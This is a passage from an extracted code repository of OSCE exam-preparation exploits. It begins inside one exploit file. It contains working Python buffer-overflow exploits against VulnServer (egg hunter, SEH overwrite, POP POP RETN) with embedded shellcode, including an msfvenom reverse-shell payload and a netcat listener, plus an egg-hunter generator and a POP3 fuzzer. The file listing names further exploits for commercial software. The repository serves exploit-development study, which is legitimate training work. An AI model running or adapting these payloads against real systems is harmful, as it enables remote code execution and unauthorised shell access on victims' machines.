shellcode += "\x34\x64\x61\x65\x38\x64\x56\x38\x4e\x6b\x53\x68"
shellcode += "\x45\x74\x55\x51\x58\x53\x70\x66\x6c\x4b\x46\x6c"
shellcode += "\x32\x6b\x4e\x6b\x46\x38\x77\x6c\x66\x61\x49\x43"
shellcode += "\x4e\x6b\x43\x34\x4e\x6b\x55\x51\x7a\x70\x6d\x59"
shellcode += "\x37\x34\x71\x34\x65\x74\x43\x6b\x33\x6b\x63\x51"
shellcode += "\x71\x49\x50\x5a\x70\x51\x49\x6f\x69\x70\x73\x6f"
shellcode += "\x43\x6f\x31\x4a\x6e\x6b\x42\x32\x5a\x4b\x4c\x4d"
shellcode += "\x53\x6d\x61\x78\x77\x43\x70\x32\x73\x30\x57\x70"
shellcode += "\x61\x78\x34\x37\x53\x43\x34\x72\x53\x6f\x31\x44"
shellcode += "\x30\x68\x30\x4c\x42\x57\x77\x56\x63\x37\x79\x6f"
shellcode += "\x69\x45\x6f\x48\x4a\x30\x35\x51\x53\x30\x73\x30"
shellcode += "\x76\x49\x68\x44\x31\x44\x72\x70\x35\x38\x64\x69"
shellcode += "\x6f\x70\x50\x6b\x65\x50\x4b\x4f\x58\x55\x30\x50"
shellcode += "\x72\x70\x52\x70\x50\x50\x73\x70\x52\x70\x61\x50"
shellcode += "\x32\x70\x51\x78\x79\x7a\x46\x6f\x69\x4f\x69\x70"
shellcode += "\x79\x6f\x4a\x75\x6c\x57\x62\x4a\x43\x35\x61\x78"
shellcode += "\x4f\x30\x69\x38\x72\x70\x6f\x67\x72\x48\x54\x42"
shellcode += "\x55\x50\x65\x55\x75\x69\x4f\x79\x6a\x46\x33\x5a"
shellcode += "\x56\x70\x33\x66\x62\x77\x50\x68\x7a\x39\x6d\x75"
shellcode += "\x50\x74\x33\x51\x49\x6f\x48\x55\x6b\x35\x69\x50"
shellcode += "\x51\x64\x46\x6c\x4b\x4f\x42\x6e\x47\x78\x52\x55"
shellcode += "\x48\x6c\x63\x58\x48\x70\x4d\x65\x49\x32\x33\x66"
shellcode += "\x79\x6f\x39\x45\x51\x78\x53\x53\x72\x4d\x63\x54"
shellcode += "\x55\x50\x6d\x59\x38\x63\x71\x47\x53\x67\x36\x37"
shellcode += "\x56\x51\x68\x76\x70\x6a\x65\x42\x56\x39\x50\x56"
shellcode += "\x49\x72\x49\x6d\x33\x56\x49\x57\x33\x74\x77\x54"
shellcode += "\x47\x4c\x37\x71\x75\x51\x6e\x6d\x53\x74\x67\x54"
shellcode += "\x72\x30\x49\x56\x63\x30\x57\x34\x50\x54\x70\x50"
shellcode += "\x36\x36\x61\x46\x51\x46\x52\x66\x51\x46\x62\x6e"
shellcode += "\x61\x46\x51\x46\x50\x53\x70\x56\x75\x38\x70\x79"
shellcode += "\x4a\x6c\x57\x4f\x4f\x76\x69\x6f\x6a\x75\x6b\x39"
shellcode += "\x59\x70\x52\x6e\x62\x76\x30\x46\x59\x6f\x74\x70"
shellcode += "\x61\x78\x47\x78\x4d\x57\x67\x6d\x65\x30\x79\x6f"
shellcode += "\x6a\x75\x4f\x4b\x6a\x50\x6f\x45\x4d\x72\x42\x76"
shellcode += "\x62\x48\x6d\x76\x6c\x55\x4d\x6d\x6f\x6d\x59\x6f"
shellcode += "\x39\x45\x45\x6c\x67\x76\x61\x6c\x66\x6a\x6d\x50"
shellcode += "\x39\x6b\x49\x70\x33\x45\x57\x75\x4d\x6b\x63\x77"
shellcode += "\x45\x43\x72\x52\x42\x4f\x31\x7a\x63\x30\x52\x73"
shellcode += "\x4b\x4f\x59\x45\x41\x41"
# first payload
Eggy = 'T00WT00W'
Eggy += shellcode
Eggy += '\x41' * (1000-len(shellcode)-10)
Eggy += '\r\n'
'''
or dx,0x0fff # loop thru memory pages
inc edx by 1 # loop thru addresses for given page
push edx # save EDX in stack before syscall
push byte +0x43 # push 0x43 (syscall id for NtDisplayString) onto the stack
pop eax # store it in EAX
int 0x2e # make syscall
cmp al,0x5 # compare lower portion of EAX with 5 to check for access violations
pop edx # restore EDX after syscal was made
jz 0x0 # if true go back to first instruction and check the next memory page
mov eax,w00t # else move egg marker value to eax
mov edi,edx # move pointer to EDI
scasd # check for egg value match
jnz 0x5 # if true jump to increment EDX and check the next memory address in page
scasd # else increment EDI and check the value again (to make sure it's not egghunter code)
jnz 0x5 # if true jump to increment EDX and check the next memory address in page
jmp edi # else egg marker found! execute shellcode positioned right after
'''
EggHunter = '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7\x90'
'''
spike file
----------
s_string("GTER");
s_string(" ");
s_string_variable("FUZZ");
s_string("\r\n");
sleep(1);
'''
# second payload
buffer = 'GTER /.:/' # vulnerable command
'''
0: 5a pop edx
1: 4d dec ebp
2: 5f pop edi
'''
buffer += '\x5a\x4d\x5f' # stack alignment to compensate for changes made by GTER command
buffer += EggHunter # hunt baby hunt
buffer += '\x41' * (147-3-len(EggHunter)) # filler to save pointer
buffer += '\xb1\x11\x50\x62' # EIP [call eax] to get back to the start of our the buffer
buffer += '\x43' * (5000-9-147-4-2) # filler
buffer += '\r\n'
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.80.133', 9999))
print '[+] Sending %s bytes of eggy' %len(Eggy)
s.send(Eggy)
s.close
time.sleep(1)
except Exception as e:
print e
try:
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.80.133', 9999))
print '[+] Sending %s bytes of buffer' %len(buffer)
time.sleep(1)
s.send(buffer)
subprocess.call(['nc -nlvp 1337'], shell=True)
except Exception as e:
print e
================================================
FILE: Remote Buffer Overflow/VulnServer/Egg Hunter/README.md
================================================
Save pointer overrun found in `GTER` command, egg hunter was used to overcome small buffer size issue.
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/Egg%20Hunter/PoC.gif">
</p>
================================================
FILE: Remote Buffer Overflow/VulnServer/POP POP RETN/Exploit.py
================================================
#!/usr/share/python
import struct
import time
import socket
from pwn import *
def BufferOverflow():
# https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
shellcode = ""
shellcode += "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
shellcode += "\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
shellcode += "\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01"
shellcode += "\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75"
shellcode += "\xf2\x81\x7e\x08\x6f\x63\x65\x73"
shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
shellcode += "\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
shellcode += "\xb1\xff\x53\xe2\xfd\x68\x63\x61"
shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53"
shellcode += "\x53\x53\x53\x53\x52\x53\xff\xd7"
#----------------------------#
# Payload #
#----------------------------#
# buffer = CMD + AAA padding # |-------------------------------------------------------------+
# buffer = EIP overwrite # |---------| WinXP SP3 Pro [POP POP RETN]|[USER32.dll] |-------|-+
# buffer = XXXXXXXX # |------------| Simulate the need for [POP POP RETN] |---------|-|-+
# buffer = JMP ESP # |---------| WinXP SP3 Pro : [JMP ESP] | [essfunc.dll] |-------|-|-|-+
# buffer = NOP sled # |-------------------------------------------------------------|-|-|-|-+
# buffer = shellcode # |-------------------------------------------------------------|-|-|-|-|-+
# buffer = BBB padding # |-------------------------------------------------------------|-|-|-|-|-|-+
#----------------------------# | | | | | | |
# | | | | | | |
buffer = "TRUN ." + "A" * 2006 # <-----------------------------------+ | | | | | |
buffer += struct.pack('<L', 0x7E41FE66) # <-------------------------------------+ | | | | |
buffer += "X" * 8 # <---------------------------------------+ | | | |
buffer += struct.pack('<L', 0x625011af) # <-----------------------------------------+ | | |
buffer += "\x90" * 20 # <-------------------------------------------+ | |
buffer += shellcode # <---------------------------------------------+ |
buffer += "B" * (3000-6-2006-4-8-4-20-len(shellcode)) # <-----------------------------------------------+
try:
r = remote('192.168.80.133', 9999)
r.recv(2048)
print "[+] Sending %s bytes evil payload.." %len(buffer)
r.send(buffer)
except:
print "Couldn't connect to target!"
def main():
print (
'''
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
|V|u|l|n|S|e|r|v|e|r| |R|e|m|o|t|e| |B|u|f|f|e|r| |O|v|e|r|f|l|o|w|
+-+-+-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+
'''
)
BufferOverflow()
if __name__ == '__main__':
main()
================================================
FILE: Remote Buffer Overflow/VulnServer/SEH/Exploit.py
================================================
import socket
import sys
import os
import subprocess
#root@kali:~# msfvenom -p windows/shell_reverse_tcp lhost=192.168.80.151 lport=1337 -b '\x00' EXITFUNC=seh -f python -v shellcode
#No platform was selected, choosing Msf::Module::Platform::Windows from the payload
#No Arch selected, selecting Arch: x86 from the payload
#Found 10 compatible encoders
#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
#x86/shikata_ga_nai succeeded with size 351 (iteration=0)
#x86/shikata_ga_nai chosen with final size 351
#Payload size: 351 bytes
#Final size of python file: 1900 bytes
shellcode = ""
shellcode += "\xda\xcc\xbe\xc1\x1a\x26\xcc\xd9\x74\x24\xf4\x5f"
shellcode += "\x29\xc9\xb1\x52\x31\x77\x17\x83\xef\xfc\x03\xb6"
shellcode += "\x09\xc4\x39\xc4\xc6\x8a\xc2\x34\x17\xeb\x4b\xd1"
shellcode += "\x26\x2b\x2f\x92\x19\x9b\x3b\xf6\x95\x50\x69\xe2"
shellcode += "\x2e\x14\xa6\x05\x86\x93\x90\x28\x17\x8f\xe1\x2b"
shellcode += "\x9b\xd2\x35\x8b\xa2\x1c\x48\xca\xe3\x41\xa1\x9e"
shellcode += "\xbc\x0e\x14\x0e\xc8\x5b\xa5\xa5\x82\x4a\xad\x5a"
shellcode += "\x52\x6c\x9c\xcd\xe8\x37\x3e\xec\x3d\x4c\x77\xf6"
shellcode += "\x22\x69\xc1\x8d\x91\x05\xd0\x47\xe8\xe6\x7f\xa6"
shellcode += "\xc4\x14\x81\xef\xe3\xc6\xf4\x19\x10\x7a\x0f\xde"
shellcode += "\x6a\xa0\x9a\xc4\xcd\x23\x3c\x20\xef\xe0\xdb\xa3"
shellcode += "\xe3\x4d\xaf\xeb\xe7\x50\x7c\x80\x1c\xd8\x83\x46"
shellcode += "\x95\x9a\xa7\x42\xfd\x79\xc9\xd3\x5b\x2f\xf6\x03"
shellcode += "\x04\x90\x52\x48\xa9\xc5\xee\x13\xa6\x2a\xc3\xab"
shellcode += "\x36\x25\x54\xd8\x04\xea\xce\x76\x25\x63\xc9\x81"
shellcode += "\x4a\x5e\xad\x1d\xb5\x61\xce\x34\x72\x35\x9e\x2e"
shellcode += "\x53\x36\x75\xae\x5c\xe3\xda\xfe\xf2\x5c\x9b\xae"
shellcode += "\xb2\x0c\x73\xa4\x3c\x72\x63\xc7\x96\x1b\x0e\x32"
shellcode += "\x71\xe4\x67\x6c\x16\x8c\x75\x8c\x1d\x74\xf3\x6a"
shellcode += "\x77\x96\x55\x25\xe0\x0f\xfc\xbd\x91\xd0\x2a\xb8"
shellcode += "\x92\x5b\xd9\x3d\x5c\xac\x94\x2d\x09\x5c\xe3\x0f"
shellcode += "\x9c\x63\xd9\x27\x42\xf1\x86\xb7\x0d\xea\x10\xe0"
shellcode += "\x5a\xdc\x68\x64\x77\x47\xc3\x9a\x8a\x11\x2c\x1e"
shellcode += "\x51\xe2\xb3\x9f\x14\x5e\x90\x8f\xe0\x5f\x9c\xfb"
shellcode += "\xbc\x09\x4a\x55\x7b\xe0\x3c\x0f\xd5\x5f\x97\xc7"
shellcode += "\xa0\x93\x28\x91\xac\xf9\xde\x7d\x1c\x54\xa7\x82"
shellcode += "\x91\x30\x2f\xfb\xcf\xa0\xd0\xd6\x4b\xde\x21\xea"
shellcode += "\x41\x77\x98\x9f\x2b\x15\x1b\x4a\x6f\x20\x98\x7e"
shellcode += "\x10\xd7\x80\x0b\x15\x93\x06\xe0\x67\x8c\xe2\x06"
shellcode += "\xdb\xad\x26"
'''
spike file
----------
s_string("GMON");
s_string(" ");
s_string_variable("FUZZ");
s_string("\r\n");
'''
buffer = 'GMON /.:/ ' # junk
buffer += '\x90' * 2495 # nop sled
buffer += shellcode # reverse shell
buffer += '\x90' * (999-len(shellcode)) # shellcode placeholder
buffer += '\xeb\x0a\x90\x90' # nSEH hop over SEH handler
buffer += '\x2b\x17\x50\x62' # SEH POP, POP, RETN in essfunc.dll
'''
piece of code that allow us to jump forward/backward, taken from Phrack #62 Article 7
fldz
fnstenv [esp-12]
pop ecx
add cl, 10
nop
dec ch ; ecx=-256;
dec ch ; ecx=-256;
dec ch ; ecx=-256;
dec ch ; ecx=-256;
jmp ecx ; lets jmp ecx (current location - 1024)
'''
buffer += '\x90' * 7
buffer += '\xD9\xEE\xD9\x74\x24\xF4\x59\x80\xC1\x0A\x90\xFE\xCD\xFE\xCD\xFE\xCD\xFE\xCD\xFF\xE1'
buffer += '\x41' * (5000-10-3494-4-4-2-21-7)
buffer += '\r\n'
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('192.168.80.133', 9999))
print '[+] Sending %s bytes of evil buffer..' %len(buffer)
s.send(buffer)
subprocess.call(['nc -nlvp 1337'], shell=True)
except Exception as e:
print e
================================================
FILE: Remote Buffer Overflow/VulnServer/SEH/README.md
================================================
Vanilla Structured Exception Handler overwrite found in `GMON` command using `Spike` fuzzer.
<p align="center">
<img src="https://github.com/ihack4falafel/OSCE/blob/master/Remote%20Buffer%20Overflow/VulnServer/SEH/PoC.gif">
</p>
================================================
FILE: Remote Buffer Overflow/VulnServer/readme.md
================================================
### VulnServer
VulnerServer is a purposly vulnerable server made so people like me can learn software exploitation. The subfolders contian all working exploits found in VulnerServer.
================================================
FILE: Tools/EggHunter.py
================================================
#!/usr/bin/python
import binascii
import time
import sys
# colors (*NIX systems only)
W = '\033[0m' # white
R = '\033[91m' # Light Red
G = '\033[32m' # green
M = '\033[95m' # Light magenta
# the script takes user supplied egg as input and plug it to Skape's piece of art! the output (opcode) is debugger and binary file friendly.
# Reference: "Safely Searching Process Virtual Address Space" skape 2004 http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf
# 0: 66 81 ca ff 0f or dx,0xfff
# 5: 42 inc edx
# 6: 52 push edx
# 7: 6a 02 push 0x2
# 9: 58 pop eax
# a: cd 2e int 0x2e
# c: 3c 05 cmp al,0x5
# e: 5a pop edx
# f: 74 ef je 0x0
# 11: b8 54 30 30 57 mov eax,0x57303054 egg = "T00W"
# 16: 8b fa mov edi,edx
# 18: af scas eax,DWORD PTR es:[edi]
# 19: 75 ea jne 0x5
# 1b: af scas eax,DWORD PTR es:[edi]
# 1c: 75 e7 jne 0x5
# 1e: ff e7 jmp edi
if len(sys.argv) < 2:
print "Usage: python EggHunter.py <"+G+"egg"+W+">"
sys.exit(0)
Input = str(sys.argv[1])
Egg = binascii.hexlify(Input)
Egg = list(Egg)
OpCode = Egg[6]+Egg[7]+Egg[4]+Egg[5]+Egg[2]+Egg[3]+Egg[0]+Egg[1]
Shellcode = "\\x"+Egg[6]+Egg[7]+"\\x"+Egg[4]+Egg[5]+"\\x"+Egg[2]+Egg[3]+"\\x"+Egg[0]+Egg[1]
FinalOpcode = "6681caff0f42526a0258cd2e3c055a74efb8" +M+ OpCode +W+ "8bfaaf75eaaf75e7ffe7"
FinalShellcode = "'\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\\xef\\xb8" +M+ Shellcode +W+ "\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7'"
print "["+G+"+"+W+"] Egg Hunter shellcode with egg of '"+M+Input+W+"'.."
time.sleep(1)
print R+"Final Opcode "+W+": " + FinalOpcode
print R+"Final Shellcode "+W+": " + FinalShellcode
================================================
FILE: Tools/FuzzMe.py
================================================
#!/usr/share/python
import socket
from pwn import *
import time
def Fuzzer():
buffer = ["A"]
counter = 500
while len(buffer) <= 100:
buffer.append("A" * counter)
counter = counter + 500
try:
# Used SLMail as template here, adjust accordingly!
r = remote('192.168.199.140', 110)
r.recv(2048)
for string in buffer:
print "Fuzzing with %s bytes of payload" %len(string)
r.send('USER username\r\n')
r.recv(2048)
r.send('PASS ' + string + '\r\n')
r.recv(2048)
time.sleep(1)
except:
print "Couldn't connect to target, or you hit the jackpot!"
def main():
print (
'''
_______ _______ _______ _______ _______ _______
|\ /|\ /|\ /|\ /|\ /|\ /|
| +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |
| | | | | | | | | | | | | | | | | | |
| |F | | |u | | |z | | |z | | |M | | |e | |
| +---+ | +---+ | +---+ | +---+ | +---+ | +---+ |
|/_____\|/_____\|/_____\|/_____\|/_____\|/_____\|
by @ihack4falafel
'''
)
Fuzzer()
if __name__ == '__main__':
main()
gitextract_ec6vv2vr/
├── Local Buffer Overflow/
│ ├── 10-StrikeNetworkInventoryExplorerv8.54/
│ │ ├── From Text File/
│ │ │ └── Exploit.py
│ │ ├── README.md
│ │ └── Registration Key/
│ │ └── Exploit.py
│ ├── 10-StrikeNetworkScannerv3.0/
│ │ ├── Exploit.py
│ │ └── README.md
│ ├── DVDXPlayerProv5.5/
│ │ ├── VirtualAlloc()/
│ │ │ └── Exploit.py
│ │ ├── VirtualProtect()/
│ │ │ └── Exploit.py
│ │ └── readme.md
│ ├── EasyCDDVDCopyv1.3.24/
│ │ ├── Exploit.py
│ │ └── readme.md
│ ├── EasyRMtoMP3Converterv2.7.3.700/
│ │ ├── Exploit.py
│ │ └── readme.md
│ ├── FTPShellServerv6.80/
│ │ ├── Exploit.py
│ │ └── README.md
│ ├── QuickZipv4.60.019/
│ │ ├── Egg Hunter/
│ │ │ └── Exploit.py
│ │ ├── OS Dependent/
│ │ │ └── Exploit.py
│ │ └── README.md
│ ├── SysGaugeProv4.6.12/
│ │ ├── Exploit.py
│ │ └── readme.md
│ ├── VUPlayerv2.49/
│ │ ├── Exploit.py
│ │ └── readme.md
│ └── Zip-n-Gov4.9/
│ ├── Exploit.py
│ └── README.md
├── README.md
├── Remote Buffer Overflow/
│ ├── EasyFileSharingWebServerv7.2/
│ │ ├── Exploit.py
│ │ └── readme.md
│ └── VulnServer/
│ ├── Bad Characters/
│ │ ├── Exploit.py
│ │ └── README.md
│ ├── CALL [REG]/
│ │ └── Exploit.py
│ ├── Egg Hunter/
│ │ ├── Exploit.py
│ │ └── README.md
│ ├── POP POP RETN/
│ │ └── Exploit.py
│ ├── SEH/
│ │ ├── Exploit.py
│ │ └── README.md
│ └── readme.md
└── Tools/
├── EggHunter.py
└── FuzzMe.py
SYMBOL INDEX (8 symbols across 4 files) FILE: Local Buffer Overflow/EasyRMtoMP3Converterv2.7.3.700/Exploit.py function BufferOverflow (line 7) | def BufferOverflow(): function main (line 60) | def main(): FILE: Remote Buffer Overflow/VulnServer/CALL [REG]/Exploit.py function BufferOverflow (line 8) | def BufferOverflow(): function main (line 51) | def main(): FILE: Remote Buffer Overflow/VulnServer/POP POP RETN/Exploit.py function BufferOverflow (line 8) | def BufferOverflow(): function main (line 55) | def main(): FILE: Tools/FuzzMe.py function Fuzzer (line 7) | def Fuzzer(): function main (line 30) | def main():
Condensed preview — 37 files, each showing path, character count, and a content snippet. Download the .json file or copy for the full structured content (141K chars).
[
{
"path": "Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/From Text File/Exploit.py",
"chars": 4444,
"preview": "#!/usr/bin/python\r\n#----------------------------------------------------------------------------------------------------"
},
{
"path": "Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/README.md",
"chars": 448,
"preview": "### 10-Strike Network Inventory Explorer 8.54\nStructured Exception Handler (SEH) overwrite exploit found while studying "
},
{
"path": "Local Buffer Overflow/10-StrikeNetworkInventoryExplorerv8.54/Registration Key/Exploit.py",
"chars": 4100,
"preview": "#!/usr/bin/python\r\n#----------------------------------------------------------------------------------------------------"
},
{
"path": "Local Buffer Overflow/10-StrikeNetworkScannerv3.0/Exploit.py",
"chars": 4949,
"preview": "#!/usr/bin/python\r\n#----------------------------------------------------------------------------------------------------"
},
{
"path": "Local Buffer Overflow/10-StrikeNetworkScannerv3.0/README.md",
"chars": 343,
"preview": "### 10-Strike Network Scanner v3.0\nStructured Exception Handler (SEH) overwrite exploit found while studying for OSCE. S"
},
{
"path": "Local Buffer Overflow/DVDXPlayerProv5.5/VirtualAlloc()/Exploit.py",
"chars": 4415,
"preview": "#!/usr/bin/env python\n\nimport struct\nimport time\n\n# bad characters \"\\x00\\x0a\\x0d\\x1a\\x20\"\n\nshellcode = \"\"\nshellcode += "
},
{
"path": "Local Buffer Overflow/DVDXPlayerProv5.5/VirtualProtect()/Exploit.py",
"chars": 4166,
"preview": "#!/usr/bin/env python\n\nimport struct\nimport time\n\n# bad characters \"\\x00\\x0a\\x0d\\x1a\\x20\"\n\nshellcode = \"\"\nshellcode += "
},
{
"path": "Local Buffer Overflow/DVDXPlayerProv5.5/readme.md",
"chars": 248,
"preview": "### DVD X Player Pro v5.5\nLocal Buffer Overflow exploit with DEP bypass (ROP gadgets) using VirtualAlloc() & VirtualProt"
},
{
"path": "Local Buffer Overflow/EasyCDDVDCopyv1.3.24/Exploit.py",
"chars": 3343,
"preview": "#!/usr/bin/python\n###############################################################################\n# Exploit Title :"
},
{
"path": "Local Buffer Overflow/EasyCDDVDCopyv1.3.24/readme.md",
"chars": 319,
"preview": "### Easy CD DVD Copy v1.3.24\nStructured Exception Handler (SEH) chain overwrite exploit found during my prepperation for"
},
{
"path": "Local Buffer Overflow/EasyRMtoMP3Converterv2.7.3.700/Exploit.py",
"chars": 3593,
"preview": "#!/usr/share/python\r\n\r\nimport struct\r\nimport time\r\nimport socket\r\n\r\ndef BufferOverflow():\r\n\t\r\n\t#------------------------"
},
{
"path": "Local Buffer Overflow/EasyRMtoMP3Converterv2.7.3.700/readme.md",
"chars": 251,
"preview": "### Easy RM to MP3 Converter v2.7.3.700\n\nYet another vanilla save pointer overwirte (EIP) to pop calc.exe, nothing fancy"
},
{
"path": "Local Buffer Overflow/FTPShellServerv6.80/Exploit.py",
"chars": 4195,
"preview": "#!/usr/bin/python\n#-----------------------------------------------------------------------------------------------------"
},
{
"path": "Local Buffer Overflow/FTPShellServerv6.80/README.md",
"chars": 449,
"preview": "### FTPShell Server v6.80\nStructured Exception Handler (SEH) overwrite exploit found during my prep to take on OSCE, had"
},
{
"path": "Local Buffer Overflow/QuickZipv4.60.019/Egg Hunter/Exploit.py",
"chars": 10084,
"preview": "#!/usr/bin/python\r\n\r\n#root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\\x00\\x0a\\x0d' -e x86/alpha_mixed BufferRegiste"
},
{
"path": "Local Buffer Overflow/QuickZipv4.60.019/OS Dependent/Exploit.py",
"chars": 10751,
"preview": "#!/usr/bin/python\r\n\r\n# root@kali:~# msfvenom -p windows/shell_bind_tcp -b '\\x00\\x0a\\x0d' -e x86/alpha_mixed BufferRegist"
},
{
"path": "Local Buffer Overflow/QuickZipv4.60.019/README.md",
"chars": 271,
"preview": "### Quick Zip v4.60.019\nLocal SEH overwrite with restricted characters set. I thought this exploit was quite challenging"
},
{
"path": "Local Buffer Overflow/SysGaugeProv4.6.12/Exploit.py",
"chars": 9776,
"preview": "#!/usr/bin/python\n######################################################################################################"
},
{
"path": "Local Buffer Overflow/SysGaugeProv4.6.12/readme.md",
"chars": 395,
"preview": "### SysGauge Pro v4.6.12\nStructured Exception Handler (SEH) chain overwrite exploit found during my prep to take on OSCE"
},
{
"path": "Local Buffer Overflow/VUPlayerv2.49/Exploit.py",
"chars": 3835,
"preview": "#!/usr/bin/env python\r\n\r\nimport struct\r\nimport time\r\n\r\n#root@kali:~# msfvenom -p windows/exec CMD=calc.exe -b \"\\x00\\x09\\"
},
{
"path": "Local Buffer Overflow/VUPlayerv2.49/readme.md",
"chars": 248,
"preview": "### VUPlayer v2.49\nROP chain exploit to pop calc.exe by bypassing DEP protection on Windows XP SP3 using Windows Virtual"
},
{
"path": "Local Buffer Overflow/Zip-n-Gov4.9/Exploit.py",
"chars": 11949,
"preview": "#!/usr/bin/python\r\n#----------------------------------------------------------------------------------------------------"
},
{
"path": "Local Buffer Overflow/Zip-n-Gov4.9/README.md",
"chars": 325,
"preview": "### Zip-n-Go v4.9\nStructured Exception Handler (SEH) overwrite exploit found while studying about ZIP file headers. See "
},
{
"path": "README.md",
"chars": 280,
"preview": "# OSCE\nSome of the sploits and tools made during my joruney to take on OSCE. Mostly useless.. \n\n\n<p align=\"center\">\n <i"
},
{
"path": "Remote Buffer Overflow/EasyFileSharingWebServerv7.2/Exploit.py",
"chars": 12831,
"preview": "#!/usr/bin/env python\n#-------------------------------------------------------------------------------------------------"
},
{
"path": "Remote Buffer Overflow/EasyFileSharingWebServerv7.2/readme.md",
"chars": 354,
"preview": "### Easy File Sharing Web Server v7.2\nRemote SEH based Buffer Overflow exploit with DEP bypass (ROP gadgets) using Virtu"
},
{
"path": "Remote Buffer Overflow/VulnServer/Bad Characters/Exploit.py",
"chars": 7204,
"preview": "import time\nimport socket\nimport subprocess\n\n'''\nNotes:\n======\n- Bad characters are everything beyond '\\x7f' and obvious"
},
{
"path": "Remote Buffer Overflow/VulnServer/Bad Characters/README.md",
"chars": 241,
"preview": "Structured Exception Handler overwrite with limited character set and small buffer size.\n\n<p align=\"center\">\n <img src="
},
{
"path": "Remote Buffer Overflow/VulnServer/CALL [REG]/Exploit.py",
"chars": 2671,
"preview": "#!/usr/share/python\n\nimport struct\nimport time\nimport socket\nfrom pwn import *\n\ndef BufferOverflow():\n\n\t# https://packet"
},
{
"path": "Remote Buffer Overflow/VulnServer/Egg Hunter/Exploit.py",
"chars": 7070,
"preview": "import time\nimport socket\nimport subprocess\n\n\n# root@kali:~# msfvenom -p windows/shell_reverse_tcp lhost=192.168.80.151 "
},
{
"path": "Remote Buffer Overflow/VulnServer/Egg Hunter/README.md",
"chars": 250,
"preview": "Save pointer overrun found in `GTER` command, egg hunter was used to overcome small buffer size issue.\n<p align=\"center\""
},
{
"path": "Remote Buffer Overflow/VulnServer/POP POP RETN/Exploit.py",
"chars": 3184,
"preview": "#!/usr/share/python\n\nimport struct\nimport time\nimport socket\nfrom pwn import *\n\ndef BufferOverflow():\n\n\t# https://packet"
},
{
"path": "Remote Buffer Overflow/VulnServer/SEH/Exploit.py",
"chars": 3670,
"preview": "import socket\nimport sys\nimport os\nimport subprocess\n\n#root@kali:~# msfvenom -p windows/shell_reverse_tcp lhost=192.168."
},
{
"path": "Remote Buffer Overflow/VulnServer/SEH/README.md",
"chars": 232,
"preview": "Vanilla Structured Exception Handler overwrite found in `GMON` command using `Spike` fuzzer.\n\n<p align=\"center\">\n <img "
},
{
"path": "Remote Buffer Overflow/VulnServer/readme.md",
"chars": 294,
"preview": "### VulnServer\n\nVulnerServer is a purposly vulnerable server made so people like me can learn software exploitation. The"
},
{
"path": "Tools/EggHunter.py",
"chars": 2036,
"preview": "#!/usr/bin/python\n\nimport binascii\nimport time\nimport sys\n\n# colors (*NIX systems only)\nW = '\\033[0m' # white\nR = '\\033"
},
{
"path": "Tools/FuzzMe.py",
"chars": 1036,
"preview": "#!/usr/share/python\n\nimport socket\nfrom pwn import *\nimport time\n\ndef Fuzzer():\n\n\tbuffer = [\"A\"]\n\tcounter = 500\n\twhile l"
}
]
About this extraction
This page contains the full source code of the ihack4falafel/OSCE GitHub repository, extracted and formatted as plain text for AI agents and large language models (LLMs). The extraction includes 37 files (121.3 KB), approximately 46.4k tokens, and a symbol index with 8 extracted functions, classes, methods, constants, and types. Use this with OpenClaw, Claude, ChatGPT, Cursor, Windsurf, or any other AI tool that accepts text input. You can copy the full output to your clipboard or download it as a .txt file.
Extracted by GitExtract — free GitHub repo to text converter for AI. Built by Nikandr Surkov.